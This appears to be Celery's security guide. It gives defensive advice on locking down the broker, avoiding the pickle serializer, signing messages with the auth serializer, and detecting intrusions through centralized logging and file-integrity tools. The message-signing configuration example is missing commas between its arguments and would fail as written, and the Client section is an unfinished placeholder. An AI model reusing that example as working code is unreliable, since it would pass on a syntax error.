| 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249 | .. _guide-security:========== Security==========.. contents::    :local:Introduction============While Celery is written with security in mind, it should be treated as anunsafe component.Depending on your `Security Policy`_, there arevarious steps you can take to make your Celery installation more secure... _`Security Policy`: https://en.wikipedia.org/wiki/Security_policyAreas of Concern================Broker------It's imperative that the broker is guarded from unwanted access, especiallyif accessible to the public.By default, workers trust that the data they get from the broker hasn'tbeen tampered with. See `Message Signing`_ for information on how to makethe broker connection more trustworthy.The first line of defense should be to put a firewall in front of the broker,allowing only white-listed machines to access it.Keep in mind that both firewall misconfiguration, and temporarily disablingthe firewall, is common in the real world. Solid security policy includesmonitoring of firewall equipment to detect if they've been disabled, be itaccidentally or on purpose.In other words, one shouldn't blindly trust the firewall either.If your broker supports fine-grained access control, like RabbitMQ,this is something you should look at enabling. See for examplehttp://www.rabbitmq.com/access-control.html.If supported by your broker backend, you can enable end-to-end SSL encryptionand authentication using :setting:`broker_use_ssl`.Client------In Celery, "client" refers to anything that sends messages to thebroker, for example web-servers that apply tasks.Having the broker properly secured doesn't matter if arbitrary messagescan be sent through a client.*[Need more text here]*Worker------The default permissions of tasks running inside a worker are the same ones asthe privileges of the worker itself. This applies to resources, such as;memory, file-systems, and devices.An exception to this rule is when using the multiprocessing based task pool,which is currently the default. In this case, the task will have access toany memory copied as a result of the :func:`fork` call,and access to memory contents written by parent tasks in the same workerchild process.Limiting access to memory contents can be done by launching every taskin a subprocess (:func:`fork` + :func:`execve`).Limiting file-system and device access can be accomplished by using`chroot`_, `jail`_, `sandboxing`_, virtual machines, or othermechanisms as enabled by the platform or additional software.Note also that any task executed in the worker will have thesame network access as the machine on which it's running. If the workeris located on an internal network it's recommended to add firewall rules foroutbound traffic... _`chroot`: https://en.wikipedia.org/wiki/Chroot.. _`jail`: https://en.wikipedia.org/wiki/FreeBSD_jail.. _`sandboxing`:    https://en.wikipedia.org/wiki/Sandbox_(computer_security).. _security-serializers:Serializers===========The default serializer is JSON since version 4.0, but since it hasonly support for a restricted set of types you may want to considerusing pickle for serialization instead.The `pickle` serializer is convenient as it can serializealmost any Python object, even functions with some work,but for the same reasons `pickle` is inherently insecure [*]_,and should be avoided whenever clients are untrusted orunauthenticated.You can disable untrusted content by specifyinga white-list of accepted content-types in the :setting:`accept_content`setting:.. versionadded:: 3.0.18.. note::    This setting was first supported in version 3.0.18. If you're    running an earlier version it will simply be ignored, so make    sure you're running a version that supports it... code-block:: python    accept_content = ['json']This accepts a list of serializer names and content-types, so you couldalso specify the content type for json:.. code-block:: python    accept_content = ['application/json']Celery also comes with a special `auth` serializer that validatescommunication between Celery clients and workers, making surethat messages originates from trusted sources.Using `Public-key cryptography` the `auth` serializer can verify theauthenticity of senders, to enable this read :ref:`message-signing`for more information... _`Public-key cryptography`:    https://en.wikipedia.org/wiki/Public-key_cryptography.. _message-signing:Message Signing===============Celery can use the :pypi:`pyOpenSSL` library to sign message using`Public-key cryptography`, wheremessages sent by clients are signed using a private keyand then later verified by the worker using a public certificate.Optimally certificates should be signed by an official`Certificate Authority`_, but they can also be self-signed.To enable this you should configure the :setting:`task_serializer`setting to use the `auth` serializer.Also required is configuring thepaths used to locate private keys and certificates on the file-system:the :setting:`security_key`,:setting:`security_certificate`, and :setting:`security_cert_store`settings respectively.With these configured it's also necessary to call the:func:`celery.setup_security` function. Note that this will alsodisable all insecure serializers so that the worker won't acceptmessages with untrusted content types.This is an example configuration using the `auth` serializer,with the private key and certificate files located in `/etc/ssl`... code-block:: python    app = Celery()    app.conf.update(        security_key='/etc/ssl/private/worker.key'        security_certificate='/etc/ssl/certs/worker.pem'        security_cert_store='/etc/ssl/certs/*.pem',    )    app.setup_security().. note::    While relative paths aren't disallowed, using absolute paths    is recommended for these files.    Also note that the `auth` serializer won't encrypt the contents of    a message, so if needed this will have to be enabled separately... _`X.509`: https://en.wikipedia.org/wiki/X.509.. _`Certificate Authority`:    https://en.wikipedia.org/wiki/Certificate_authorityIntrusion Detection===================The most important part when defending your systems againstintruders is being able to detect if the system has been compromised.Logs----Logs are usually the first place to look for evidenceof security breaches, but they're useless if they can be tampered with.A good solution is to set up centralized logging with a dedicated loggingserver. Access to it should be restricted.In addition to having all of the logs in a single place, if configuredcorrectly, it can make it harder for intruders to tamper with your logs.This should be fairly easy to setup using syslog (see also `syslog-ng`_ and`rsyslog`_). Celery uses the :mod:`logging` library, and already hassupport for using syslog.A tip for the paranoid is to send logs using UDP and cut thetransmit part of the logging server's network cable :-).. _`syslog-ng`: https://en.wikipedia.org/wiki/Syslog-ng.. _`rsyslog`: http://www.rsyslog.com/Tripwire--------`Tripwire`_ is a (now commercial) data integrity tool, with severalopen source implementations, used to keepcryptographic hashes of files in the file-system, so that administratorscan be alerted when they change. This way when the damage is done and yoursystem has been compromised you can tell exactly what files intrudershave changed  (password files, logs, back-doors, root-kits, and so on).Often this is the only way you'll be able to detect an intrusion.Some open source implementations include:* `OSSEC`_* `Samhain`_* `Open Source Tripwire`_* `AIDE`_Also, the `ZFS`_ file-system comes with built-in integrity checksthat can be used... _`Tripwire`: http://tripwire.com/.. _`OSSEC`: http://www.ossec.net/.. _`Samhain`: http://la-samhna.de/samhain/index.html.. _`AIDE`: http://aide.sourceforge.net/.. _`Open Source Tripwire`: http://sourceforge.net/projects/tripwire/.. _`ZFS`: https://en.wikipedia.org/wiki/ZFS.. rubric:: Footnotes.. [*] https://blog.nelhage.com/2011/03/exploiting-pickle/
 |